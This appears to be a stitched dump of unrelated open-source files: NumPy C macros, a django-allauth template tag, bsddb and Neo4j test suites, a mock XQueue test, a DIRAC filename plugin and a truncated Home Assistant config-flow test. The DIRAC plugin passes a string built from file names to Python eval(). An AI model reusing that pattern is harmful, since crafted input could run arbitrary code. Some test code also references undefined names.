__slots__ data structure. */
#define DECLARE_SLOT_OFFSET(attr,cls) \
PyMemberDescrObject *attr ## _descr = (PyMemberDescrObject *)PyObject_GetAttrString(cls,#attr); \
Py_ssize_t attr ## _offset = attr ## _descr->d_member->offset; \
Py_DECREF(attr ## _descr)
/* After a previous declaration of DECLARE_SLOT_OFFSET, for an
instance obj of that class and the given attr, retrieves the value
of that attribute from its slot. */
#define LOOKUP_FROM_SLOT_OFFSET(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset)); \
type *attr = (type *)(attr ## _obj->data)
/* LOOKUP_FROM_SLOT_OFFSET without declaring data variable */
#define LOOKUP_FROM_SLOT_OFFSET_UNDECL_DATA(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset));
/* Same as LOOKUP_FROM_SLOT_OFFSET but ensures the array is contiguous.
Must call DECREF_CONTIGUOUS_ARRAY(attr) to release temporary.
Does PyArray_FLOAT need to be an argument for this to work with doubles? */
// This code is optimized for contiguous arrays, which are typical,
// but we make it work for noncontiguous arrays (e.g. views) by
// creating a contiguous copy if necessary.
//
// CEBALERT: I think there are better alternatives
// e.g. PyArray_GETCONTIGUOUS (PyArrayObject*) (PyObject* op)
// (p248 of numpybook), which only acts if necessary...
// Do we have a case where we know this code is being
// called, so that I can test it easily?
// CEBALERT: weights_obj appears below. Doesn't that mean this thing
// will only work when attr is weights?
#define CONTIGUOUS_ARRAY_FROM_SLOT_OFFSET(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset)); \
type *attr = 0; \
PyArrayObject * attr ## _array = 0; \
if(PyArray_ISCONTIGUOUS(weights_obj)) \
attr = (type *)(attr ## _obj->data); \
else { \
attr ## _array = (PyArrayObject*) PyArray_ContiguousFromObject((PyObject*)attr ## _obj,PyArray_FLOAT,2,2); \
attr = (type *) attr ## _array->data; \
}
#define DECREF_CONTIGUOUS_ARRAY(attr) \
if(attr ## _array != 0) { \
Py_DECREF(attr ## _array); }
#define UNPACK_FOUR_TUPLE(type,i1,i2,i3,i4,tuple) \
type i1 = *tuple++; \
type i2 = *tuple++; \
type i3 = *tuple++; \
type i4 = *tuple
"""
# Simple test
if __name__ == '__main__':
inline('printf("Hello World!!\\n");')
| bsd-3-clause |
agriffis/django-allauth | allauth/account/templatetags/account.py | 43 | 1159 | from django import template
from allauth.account.utils import user_display
register = template.Library()
class UserDisplayNode(template.Node):
def __init__(self, user, as_var=None):
self.user_var = template.Variable(user)
self.as_var = as_var
def render(self, context):
user = self.user_var.resolve(context)
display = user_display(user)
if self.as_var:
context[self.as_var] = display
return ""
return display
@register.tag(name="user_display")
def do_user_display(parser, token):
"""
Example usage::
{% user_display user %}
or if you need to use in a {% blocktrans %}::
{% user_display user as user_display %}
{% blocktrans %}{{ user_display }} has sent you a gift.{% endblocktrans %}
"""
bits = token.split_contents()
if len(bits) == 2:
user = bits[1]
as_var = None
elif len(bits) == 4:
user = bits[1]
as_var = bits[3]
else:
raise template.TemplateSyntaxError(
"'%s' takes either two or four arguments" % bits[0])
return UserDisplayNode(user, as_var)
| mit |
Lh4cKg/sl4a | python/src/Lib/bsddb/test/test_dbshelve.py | 33 | 11290 | """
TestCases for checking dbShelve objects.
"""
import os, string
import random
import unittest
from test_all import db, dbshelve, test_support, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
# We want the objects to be comparable so we can test dbshelve.values
# later on.
class DataClass:
def __init__(self):
self.value = random.random()
def __repr__(self) : # For Python 3.0 comparison
return "DataClass %f" %self.value
def __cmp__(self, other): # For Python 2.x comparison
return cmp(self.value, other)
class DBShelveTestCase(unittest.TestCase):
def setUp(self):
import sys
if sys.version_info[0] >= 3 :
from test_all import do_proxy_db_py3k
self._flag_proxy_db_py3k = do_proxy_db_py3k(False)
self.filename = get_new_database_path()
self.do_open()
def tearDown(self):
import sys
if sys.version_info[0] >= 3 :
from test_all import do_proxy_db_py3k
do_proxy_db_py3k(self._flag_proxy_db_py3k)
self.do_close()
test_support.unlink(self.filename)
def mk(self, key):
"""Turn key into an appropriate key type for this db"""
# override in child class for RECNO
import sys
if sys.version_info[0] < 3 :
return key
else :
return bytes(key, "iso8859-1") # 8 bits
def populateDB(self, d):
for x in string.letters:
d[self.mk('S' + x)] = 10 * x # add a string
d[self.mk('I' + x)] = ord(x) # add an integer
d[self.mk('L' + x)] = [x] * 10 # add a list
inst = DataClass() # add an instance
inst.S = 10 * x
inst.I = ord(x)
inst.L = [x] * 10
d[self.mk('O' + x)] = inst
# overridable in derived classes to affect how the shelf is created/opened
def do_open(self):
self.d = dbshelve.open(self.filename)
# and closed...
def do_close(self):
self.d.close()
def test01_basics(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test01_basics..." % self.__class__.__name__
self.populateDB(self.d)
self.d.sync()
self.do_close()
self.do_open()
d = self.d
l = len(d)
k = d.keys()
s = d.stat()
f = d.fd()
if verbose:
print "length:", l
print "keys:", k
print "stats:", s
self.assertEqual(0, d.has_key(self.mk('bad key')))
self.assertEqual(1, d.has_key(self.mk('IA')))
self.assertEqual(1, d.has_key(self.mk('OA')))
d.delete(self.mk('IA'))
del d[self.mk('OA')]
self.assertEqual(0, d.has_key(self.mk('IA')))
self.assertEqual(0, d.has_key(self.mk('OA')))
self.assertEqual(len(d), l-2)
values = []
for key in d.keys():
value = d[key]
values.append(value)
if verbose:
print "%s: %s" % (key, value)
self.checkrec(key, value)
dbvalues = d.values()
self.assertEqual(len(dbvalues), len(d.keys()))
import sys
if sys.version_info[0] < 3 :
values.sort()
dbvalues.sort()
self.assertEqual(values, dbvalues)
else : # XXX: Convert all to strings. Please, improve
values.sort(key=lambda x : str(x))
dbvalues.sort(key=lambda x : str(x))
self.assertEqual(repr(values), repr(dbvalues))
items = d.items()
self.assertEqual(len(items), len(values))
for key, value in items:
self.checkrec(key, value)
self.assertEqual(d.get(self.mk('bad key')), None)
self.assertEqual(d.get(self.mk('bad key'), None), None)
self.assertEqual(d.get(self.mk('bad key'), 'a string'), 'a string')
self.assertEqual(d.get(self.mk('bad key'), [1, 2, 3]), [1, 2, 3])
d.set_get_returns_none(0)
self.assertRaises(db.DBNotFoundError, d.get, self.mk('bad key'))
d.set_get_returns_none(1)
d.put(self.mk('new key'), 'new data')
self.assertEqual(d.get(self.mk('new key')), 'new data')
self.assertEqual(d[self.mk('new key')], 'new data')
def test02_cursors(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test02_cursors..." % self.__class__.__name__
self.populateDB(self.d)
d = self.d
count = 0
c = d.cursor()
rec = c.first()
while rec is not None:
count = count + 1
if verbose:
print rec
key, value = rec
self.checkrec(key, value)
# Hack to avoid conversion by 2to3 tool
rec = getattr(c, "next")()
del c
self.assertEqual(count, len(d))
count = 0
c = d.cursor()
rec = c.last()
while rec is not None:
count = count + 1
if verbose:
print rec
key, value = rec
self.checkrec(key, value)
rec = c.prev()
self.assertEqual(count, len(d))
c.set(self.mk('SS'))
key, value = c.current()
self.checkrec(key, value)
del c
def test03_append(self):
# NOTE: this is overridden in RECNO subclass, don't change its name.
if verbose:
print '\n', '-=' * 30
print "Running %s.test03_append..." % self.__class__.__name__
self.assertRaises(dbshelve.DBShelveError,
self.d.append, 'unit test was here')
def checkrec(self, key, value):
# override this in a subclass if the key type is different
import sys
if sys.version_info[0] >= 3 :
if isinstance(key, bytes) :
key = key.decode("iso8859-1") # 8 bits
x = key[1]
if key[0] == 'S':
self.assertEqual(type(value), str)
self.assertEqual(value, 10 * x)
elif key[0] == 'I':
self.assertEqual(type(value), int)
self.assertEqual(value, ord(x))
elif key[0] == 'L':
self.assertEqual(type(value), list)
self.assertEqual(value, [x] * 10)
elif key[0] == 'O':
import sys
if sys.version_info[0] < 3 :
from types import InstanceType
self.assertEqual(type(value), InstanceType)
else :
self.assertEqual(type(value), DataClass)
self.assertEqual(value.S, 10 * x)
self.assertEqual(value.I, ord(x))
self.assertEqual(value.L, [x] * 10)
else:
self.assert_(0, 'Unknown key type, fix the test')
#----------------------------------------------------------------------
class BasicShelveTestCase(DBShelveTestCase):
def do_open(self):
self.d = dbshelve.DBShelf()
self.d.open(self.filename, self.dbtype, self.dbflags)
def do_close(self):
self.d.close()
class BTreeShelveTestCase(BasicShelveTestCase):
dbtype = db.DB_BTREE
dbflags = db.DB_CREATE
class HashShelveTestCase(BasicShelveTestCase):
dbtype = db.DB_HASH
dbflags = db.DB_CREATE
class ThreadBTreeShelveTestCase(BasicShelveTestCase):
dbtype = db.DB_BTREE
dbflags = db.DB_CREATE | db.DB_THREAD
class ThreadHashShelveTestCase(BasicShelveTestCase):
dbtype = db.DB_HASH
dbflags = db.DB_CREATE | db.DB_THREAD
#----------------------------------------------------------------------
class BasicEnvShelveTestCase(DBShelveTestCase):
def do_open(self):
self.env = db.DBEnv()
self.env.open(self.homeDir,
self.envflags | db.DB_INIT_MPOOL | db.DB_CREATE)
self.filename = os.path.split(self.filename)[1]
self.d = dbshelve.DBShelf(self.env)
self.d.open(self.filename, self.dbtype, self.dbflags)
def do_close(self):
self.d.close()
self.env.close()
def setUp(self) :
self.homeDir = get_new_environment_path()
DBShelveTestCase.setUp(self)
def tearDown(self):
import sys
if sys.version_info[0] >= 3 :
from test_all import do_proxy_db_py3k
do_proxy_db_py3k(self._flag_proxy_db_py3k)
self.do_close()
test_support.rmtree(self.homeDir)
class EnvBTreeShelveTestCase(BasicEnvShelveTestCase):
envflags = 0
dbtype = db.DB_BTREE
dbflags = db.DB_CREATE
class EnvHashShelveTestCase(BasicEnvShelveTestCase):
envflags = 0
dbtype = db.DB_HASH
dbflags = db.DB_CREATE
class EnvThreadBTreeShelveTestCase(BasicEnvShelveTestCase):
envflags = db.DB_THREAD
dbtype = db.DB_BTREE
dbflags = db.DB_CREATE | db.DB_THREAD
class EnvThreadHashShelveTestCase(BasicEnvShelveTestCase):
envflags = db.DB_THREAD
dbtype = db.DB_HASH
dbflags = db.DB_CREATE | db.DB_THREAD
#----------------------------------------------------------------------
# test cases for a DBShelf in a RECNO DB.
class RecNoShelveTestCase(BasicShelveTestCase):
dbtype = db.DB_RECNO
dbflags = db.DB_CREATE
def setUp(self):
BasicShelveTestCase.setUp(self)
# pool to assign integer key values out of
self.key_pool = list(range(1, 5000))
self.key_map = {} # map string keys to the number we gave them
self.intkey_map = {} # reverse map of above
def mk(self, key):
if key not in self.key_map:
self.key_map[key] = self.key_pool.pop(0)
self.intkey_map[self.key_map[key]] = key
return self.key_map[key]
def checkrec(self, intkey, value):
key = self.intkey_map[intkey]
BasicShelveTestCase.checkrec(self, key, value)
def test03_append(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test03_append..." % self.__class__.__name__
self.d[1] = 'spam'
self.d[5] = 'eggs'
self.assertEqual(6, self.d.append('spam'))
self.assertEqual(7, self.d.append('baked beans'))
self.assertEqual('spam', self.d.get(6))
self.assertEqual('spam', self.d.get(1))
self.assertEqual('baked beans', self.d.get(7))
self.assertEqual('eggs', self.d.get(5))
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DBShelveTestCase))
suite.addTest(unittest.makeSuite(BTreeShelveTestCase))
suite.addTest(unittest.makeSuite(HashShelveTestCase))
suite.addTest(unittest.makeSuite(ThreadBTreeShelveTestCase))
suite.addTest(unittest.makeSuite(ThreadHashShelveTestCase))
suite.addTest(unittest.makeSuite(EnvBTreeShelveTestCase))
suite.addTest(unittest.makeSuite(EnvHashShelveTestCase))
suite.addTest(unittest.makeSuite(EnvThreadBTreeShelveTestCase))
suite.addTest(unittest.makeSuite(EnvThreadHashShelveTestCase))
suite.addTest(unittest.makeSuite(RecNoShelveTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| apache-2.0 |
EduPepperPD/pepper2013 | lms/djangoapps/courseware/mock_xqueue_server/test_mock_xqueue_server.py | 3 | 3099 | import mock
import unittest
import threading
import json
import urllib
import time
from mock_xqueue_server import MockXQueueServer, MockXQueueRequestHandler
from nose.plugins.skip import SkipTest
class MockXQueueServerTest(unittest.TestCase):
'''
A mock version of the XQueue server that listens on a local
port and responds with pre-defined grade messages.
Used for lettuce BDD tests in lms/courseware/features/problems.feature
and lms/courseware/features/problems.py
This is temporary and will be removed when XQueue is
rewritten using celery.
'''
def setUp(self):
# This is a test of the test setup,
# so it does not need to run as part of the unit test suite
# You can re-enable it by commenting out the line below
raise SkipTest
# Create the server
server_port = 8034
self.server_url = 'http://127.0.0.1:%d' % server_port
self.server = MockXQueueServer(server_port,
{'correct': True, 'score': 1, 'msg': ''})
# Start the server in a separate daemon thread
server_thread = threading.Thread(target=self.server.serve_forever)
server_thread.daemon = True
server_thread.start()
def tearDown(self):
# Stop the server, freeing up the port
self.server.shutdown()
def test_grade_request(self):
# Patch post_to_url() so we can intercept
# outgoing POST requests from the server
MockXQueueRequestHandler.post_to_url = mock.Mock()
# Send a grade request
#@begin:Change lms port to 8111
#@date:2013-11-02
callback_url = 'http://127.0.0.1:8111/test_callback'
#@end
grade_header = json.dumps({'lms_callback_url': callback_url,
'lms_key': 'test_queuekey',
'queue_name': 'test_queue'})
grade_body = json.dumps({'student_info': 'test',
'grader_payload': 'test',
'student_response': 'test'})
grade_request = {'xqueue_header': grade_header,
'xqueue_body': grade_body}
response_handle = urllib.urlopen(self.server_url + '/xqueue/submit',
urllib.urlencode(grade_request))
response_dict = json.loads(response_handle.read())
# Expect that the response is success
self.assertEqual(response_dict['return_code'], 0)
# Wait a bit before checking that the server posted back
time.sleep(3)
# Expect that the server tries to post back the grading info
xqueue_body = json.dumps({'correct': True, 'score': 1,
'msg': '<div></div>'})
expected_callback_dict = {'xqueue_header': grade_header,
'xqueue_body': xqueue_body}
MockXQueueRequestHandler.post_to_url.assert_called_with(callback_url,
expected_callback_dict)
| agpl-3.0 |
yuvadm/rhizi | src/server-tests/test_db_controller.py | 4 | 15290 | # This file is part of rhizi, a collaborative knowledge graph editor.
# Copyright (C) 2014-2015 Rhizi
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import unittest
import db_controller as dbc
from db_op import DBO_add_link_set, DBO_block_chain__commit, DBO_rzdoc__clone, \
DBO_rzdb__init_DB, DBO_rzdb__fetch_DB_metablock
from db_op import DBO_add_node_set
from db_op import DBO_block_chain__list
from db_op import DBO_diff_commit__attr
from db_op import DBO_diff_commit__topo
from db_op import DBO_load_link_set
from db_op import DBO_load_node_set_by_DB_id
from db_op import DBO_match_link_id_set
from db_op import DBO_match_node_id_set
from db_op import DBO_match_node_set_by_id_attribute
from model.graph import Attr_Diff
from model.graph import Topo_Diff
from model.model import Link
from neo4j_cypher import DB_Query
from neo4j_test_util import DBO_random_data_generation
import neo4j_test_util
from neo4j_util import Neo4JException
from neo4j_util import meta_attr_list_to_meta_attr_map
from rz_config import RZ_Config
from test_util import generate_random_link_dict
from test_util import generate_random_node_dict
from test_util__pydev import debug__pydev_pd_arg
class TestDBController(unittest.TestCase):
db_ctl = None
log = None
n_map = { 'Skill': [{'id': 'skill_00', 'name': 'Kung Fu'},
{'id': 'skill_01', 'name': 'Judo'}
],
'Person': [{'id': 'person_00', 'age': 128, 'name': 'Bob'},
{'id': 'person_01', 'age': 256, 'name': 'Alice' }
]
}
l_map = { 'Knows' : [Link.link_ptr('person_00', 'skill_00'),
Link.link_ptr('person_00', 'skill_01')] }
@classmethod
def setUpClass(self):
cfg = Config.init_from_file('res/etc/rhizi-server.conf')
self.db_ctl = dbc.DB_Controller(cfg.db_base_url)
self.log = logging.getLogger('rhizi')
self.log.addHandler(logging.StreamHandler())
def setUp(self):
# flush_DB
# op = DBO_flush_db()
# self.db_ctl.exec_op(op)
# self.db_ctl.exec_op(DBO_add_node_set(self.n_map))
# self.db_ctl.exec_op(DBO_add_link_set(self.l_map))
pass
def test_add_node_set(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_map = meta_attr_list_to_meta_attr_map([n_0, n_1])
op = DBO_add_node_set(n_map)
self.assertEqual(len(op.statement_set), 1) # assert a single statement is issued
ret_id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_id_set), 2)
self.assertTrue(n_0_id in ret_id_set)
self.assertTrue(n_1_id in ret_id_set)
def test_add_link_set(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_2, n_2_id = generate_random_node_dict(test_label)
l_0, l_0_id = generate_random_link_dict(test_label, n_0_id, n_1_id)
l_1, l_1_id = generate_random_link_dict(test_label, n_0_id, n_2_id)
n_map = meta_attr_list_to_meta_attr_map([n_0, n_1, n_2])
op = DBO_add_node_set(n_map)
self.db_ctl.exec_op(op)
l_map = { test_label : [l_0, l_1]}
op = DBO_add_link_set(l_map)
self.assertEqual(len(op.statement_set), 2) # no support yet for parameterized statements for link creation
ret_id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_id_set), 2)
self.assertTrue(l_0_id in ret_id_set)
self.assertTrue(l_1_id in ret_id_set)
def test_block_chain__commit_and_print(self):
op_0 = DBO_block_chain__commit(blob_obj='blob 1')
op_1 = DBO_block_chain__commit(blob_obj='blob 2')
op_print = DBO_block_chain__list()
_, _, hash_ret1 = self.db_ctl.exec_op(op_0)
_, _, hash_ret2 = self.db_ctl.exec_op(op_1)
hash_list = self.db_ctl.exec_op(op_print)
hash_commit_0 = DBO_block_chain__commit.calc_blob_hash() # default empty blob hash
self.assertEqual(hash_list.pop(), hash_commit_0)
self.assertEqual(hash_list.pop(), hash_ret1)
self.assertEqual(hash_list.pop(), hash_ret2)
def test_db_op_statement_iteration(self):
s_arr = ['create (b:Book {title: \'foo\'}) return b',
'match (n) return n', ]
op = dbc.DB_op()
op.add_statement(s_arr[0])
op.add_statement(s_arr[1])
i = 0
for _, s, r in op:
# access: second tuple item -> REST-form 'statement' key
self.assertTrue(type(s), DB_Query)
self.assertEqual(None, r)
i = i + 1
self.db_ctl.exec_op(op)
i = 0
for _, s, r_set in op:
# access: second tuple item -> REST-form 'statement' key
self.assertNotEqual(None, r_set)
for x in r_set:
pass
i = i + 1
def test_diff_commit__topo(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_2, n_2_id = generate_random_node_dict(test_label)
l_0, l_0_id = generate_random_link_dict(test_label, n_0_id, n_1_id)
l_1, l_1_id = generate_random_link_dict(test_label, n_0_id, n_2_id)
n_set = [n_0, n_1, n_2]
l_set = [l_0, l_1]
topo_diff = Topo_Diff(node_set_add=n_set,
link_set_add=l_set)
# commit diff
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
# test return type
self.assertTrue(hasattr(ret_topo_diff, 'node_id_set_add'))
self.assertTrue(hasattr(ret_topo_diff, 'link_id_set_add'))
self.assertTrue(hasattr(ret_topo_diff, 'node_id_set_rm'))
self.assertTrue(hasattr(ret_topo_diff, 'link_id_set_rm'))
# test return set lengths
self.assertEqual(len(ret_topo_diff.node_id_set_add), len(n_set))
self.assertEqual(len(ret_topo_diff.link_id_set_add), len(l_set))
self.assertEqual(len(ret_topo_diff.node_id_set_rm), 0)
self.assertEqual(len(ret_topo_diff.link_id_set_rm), 0)
# assert nodes persisted
id_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute([n_0_id, n_1_id]))
self.assertEqual(len(id_set), 2)
# assert links persisted
l_ptr_0 = Link.link_ptr(src_id=n_0_id, dst_id=n_1_id)
l_ptr_1 = Link.link_ptr(src_id=n_0_id, dst_id=n_2_id)
op = DBO_load_link_set.init_from_link_ptr_set([l_ptr_0, l_ptr_1])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
# remova links
topo_diff = Topo_Diff(link_id_set_rm=[l_0_id, l_1_id])
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_topo_diff.link_id_set_rm), 2)
# assert links removed
op = DBO_load_link_set.init_from_link_ptr_set([l_ptr_0, l_ptr_1])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
# removal nodes
topo_diff = Topo_Diff(node_id_set_rm=[n_2_id])
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_topo_diff.node_id_set_rm), 1)
# assert nodes removed
op = DBO_match_node_set_by_id_attribute([n_2_id])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_diff_commit__attr(self):
# create test node
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_0['attr_0'] = 0
topo_diff = Topo_Diff(node_set_add=[n_0])
op = DBO_diff_commit__topo(topo_diff)
self.db_ctl.exec_op(op)
# apply attr_diff
attr_diff = Attr_Diff()
attr_diff.add_node_attr_write(n_0_id, 'attr_0', 0)
attr_diff.add_node_attr_write(n_0_id, 'attr_1', 'a')
attr_diff.add_node_attr_rm(n_0_id, 'attr_2')
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_diff.type__node), 1)
self.assertTrue(None != ret_diff.type__node[n_0_id])
# attr-set only
attr_diff = Attr_Diff()
attr_diff.add_node_attr_write(n_0_id, 'attr_2', 0)
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertTrue(None != ret_diff.type__node[n_0_id]['__attr_write'].get('attr_2'))
# attr-remove only
attr_diff = Attr_Diff()
attr_diff.add_node_attr_rm(n_0_id, 'attr_2')
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertTrue('attr_2' in ret_diff.type__node[n_0_id]['__attr_remove'])
def test_load_link_set(self):
# load by l_ptr
l_ptr = Link.link_ptr(src_id='person_00', dst_id='skill_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 1)
l_ptr = Link.link_ptr(src_id='person_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 2)
l_ptr = Link.link_ptr(dst_id='skill_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 1)
# load by l_ptr sets
l_ptr_set = [Link.link_ptr(s, d) for (s, d) in [('person_00', 'skill_00'), ('person_00', 'skill_01')]]
op = DBO_load_link_set.init_from_link_ptr_set(l_ptr_set)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 2)
# this should return the same link twice
l_ptr_set = [Link.link_ptr(s, d) for (s, d) in [('person_00', 'skill_00'), ('person_00', 'skill_01')]]
l_ptr_set.append(Link.link_ptr(dst_id='skill_00'))
op = DBO_load_link_set.init_from_link_ptr_set(l_ptr_set)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 3)
def test_load_node_set_by_DB_id(self):
"""
test node DB id life cycle
"""
# create nodes, get DB ids
op = DBO_add_node_set({'T_test_load_node_set_by_DB_id': [{'name': 'John Doe'},
{'name': 'John Doe'}]})
id_set = self.db_ctl.exec_op(op)
# match against DB ids
op = DBO_load_node_set_by_DB_id(id_set)
n_set = self.db_ctl.exec_op(op)
self.assertEqual(len(n_set), len(id_set), 'incorrect result size')
def test_match_node_set_by_type(self):
op = DBO_match_node_id_set(filter_label='Person')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
op = DBO_match_node_id_set(filter_label='Nan_Type')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_match_node_set_by_attribute(self):
fam = { 'name': ['Bob', u'Judo'], 'age': [128] }
n_set = self.db_ctl.exec_op(DBO_match_node_id_set(filter_attr_map=fam))
self.assertEqual(len(n_set), 1)
fam = { 'age': [128, 256, 404] }
n_set = self.db_ctl.exec_op(DBO_match_node_id_set(filter_attr_map=fam))
self.assertEqual(len(n_set), 2)
def test_match_node_set_by_DB_id(self):
pass # TODO
def test_match_node_set_by_id_attribute(self):
n_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute(['skill_00', 'person_01']))
self.assertEqual(len(n_set), 2)
def test_match_link_set_by_type(self):
op = DBO_match_link_id_set(filter_label='Knows')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
op = DBO_match_link_id_set(filter_label='Nan_Type')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_partial_query_set_execution_success(self):
"""
test:
- statement execution stops at first invalid statement
- assert create statement with result data does not actually persist in DB
From the REST API doc: 'If any errors occur while executing statements,
the server will roll back the transaction.'
"""
n_id = 'test_partial_query_set_execution_success'
op = dbc.DB_op()
op.add_statement("create (n:Person {id: '%s'}) return n" % (n_id), {}) # valid statement
op.add_statement("match (n) return n", {}) # valid statement
op.add_statement("non-valid statement #1", {})
op.add_statement("non-valid statement #2", {})
self.assertRaises(Neo4JException, self.db_ctl.exec_op, op)
self.assertEqual(len(op.result_set), 2)
self.assertEqual(len(op.error_set), 1)
# assert node creation did not persist
n_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute([n_id]))
self.assertEqual(len(n_set), 0)
def test_rz_clone(self):
op = DBO_random_data_generation(lim_n=8, lim_r=16, prob_link_create=0.7)
n_label = op.node_set_label
l_label = op.link_set_label
self.db_ctl.exec_op(op) # commit random data
op = DBO_rzdoc__clone(filter_label=n_label, limit=32)
topo_diff = self.db_ctl.exec_op(op)
n_set = topo_diff.node_set_add
l_set = topo_diff.link_set_add
# TODO improve assertions
self.assertTrue(0 < len(n_set))
self.assertTrue(0 < len(l_set))
def test_rzdb__init_DB(self):
rz_cfg = RZ_Config.generate_default()
op = DBO_rzdb__init_DB(rz_cfg.rzdoc__mainpage_name)
try: # assert first init call passes
self.db_ctl.exec_op(op)
except:
self.fail()
try: # assert second init call fails
self.db_ctl.exec_op(op)
except:
return
self.fail()
def test_rzdb__fetch_DB_metadata(self):
rz_cfg = Config.generate_default()
op = DBO_rzdb__fetch_DB_metablock()
dbmb = self.db_ctl.exec_op(op)
print('%s' % (dbmb))
def tearDown(self): pass
@debug__pydev_pd_arg
def main():
unittest.main(defaultTest='TestDBController.test_rzdb__fetch_DB_metadata', verbosity=2)
if __name__ == "__main__":
main()
| agpl-3.0 |
chaen/DIRAC | Resources/Catalog/ConditionPlugins/FilenamePlugin.py | 4 | 1394 | """
Defines the plugin to perform evaluation on the lfn name
"""
__RCSID__ = "$Id $"
from DIRAC.Resources.Catalog.ConditionPlugins.FCConditionBasePlugin import FCConditionBasePlugin
class FilenamePlugin( FCConditionBasePlugin ):
"""
This plugin is to be used when filtering based on the LFN name
"""
def __init__( self, conditions ):
""" the condition can be any method of the python string object that can be evaluated
as True or False:
* endswith
* find
* isalnum
* isalpha
* isdigit
* islower
* isspace
* istitle
* isupper
* startswith
It should be written just like if you were calling the python call yourself.
For example::
Filename=startswith('/lhcb')
Filename=istitle()
"""
super( FilenamePlugin, self ).__init__( conditions )
def eval( self, **kwargs ):
""" evaluate the parameters. The lfn argument is mandatory
"""
lfn = kwargs.get( 'lfn' )
if not lfn:
return False
evalStr = "'%s'.%s" % ( lfn, self.conditions )
try:
ret = eval( evalStr )
# Special case of 'find' which returns -1 if the pattern does not exist
if self.conditions.startswith( 'find(' ):
ret = False if ret == -1 else True
return ret
except:
return False
| gpl-3.0 |
mezz64/home-assistant | tests/components/ovo_energy/test_config_flow.py | 2 | 3180 | """Test the OVO Energy config flow."""
import aiohttp
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.ovo_energy.const import DOMAIN
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import HomeAssistant
from tests.async_mock import patch
FIXTURE_USER_INPUT = {CONF_USERNAME: "example@example.com", CONF_PASSWORD: "something"}
async def test_show_form(hass: HomeAssistant) -> None:
"""Test that the setup form is served."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
async def test_authorization_error(hass: HomeAssistant) -> None:
"""Test we show user form on connection error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate",
return_value=False,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
FIXTURE_USER_INPUT,
)
assert result2["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result2["step_id"] == "user"
assert result2["errors"] == {"base": "invalid_auth"}
async def test_connection_error(hass: HomeAssistant) -> None:
"""Test we show user form on connection error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
